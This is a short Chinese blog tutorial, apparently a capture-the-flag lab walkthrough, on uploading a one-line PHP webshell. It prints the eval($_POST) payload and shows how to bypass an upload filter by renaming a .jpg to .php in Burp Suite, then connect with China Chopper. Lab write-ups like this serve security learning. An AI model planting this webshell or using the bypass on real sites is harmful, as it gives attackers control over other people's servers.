一句話木馬上傳(webshell)
阿新 • • 發佈:2022-04-03
一句話木馬是利用檔案上傳漏洞,往網站傳入點上傳一句話木馬從而獲取和控制整個網站目錄。
一句話木馬程式碼:<?php @eval($_POST['CMD']); ?>
程式碼分析:@符號表示即使後面執行錯誤也不報錯,eval()函式表示將括號裡的字串當做程式碼來執行,$_POST['CMD']表示傳一個引數,引數名為CMD,傳入的引數為之後中國菜刀,冰蠍用來連線。
一句話木馬實現的條件:1.木馬能夠上傳成功,並且不會被kill掉。
2.知道木馬的路徑。
3. 上傳木馬能夠正常執行。
這裡我們用安鸞滲透平臺靶場檔案上傳的第二題來進行演示
登入進來後我們在收賬管理下面發現有一個傳入點
試著將本地一句話木馬傳入進去
網站做了過濾不能上傳php檔案,我們將字尾改成jpg再看看效果(這裡我用burpsuite方便大家看的更詳細一點)
發現將字尾改成jpg就可以上傳成功,那麼我們在burp軟體裡再將jpg字尾改成php看看效果
發現效果一樣說明我們一句話木馬上傳成功了!!
接著我們找到上傳的路徑發現是upload/1.php
下面用菜刀進行連線
連線成功!!!!
最後就是找flag了,這裡就不在進行更多的演示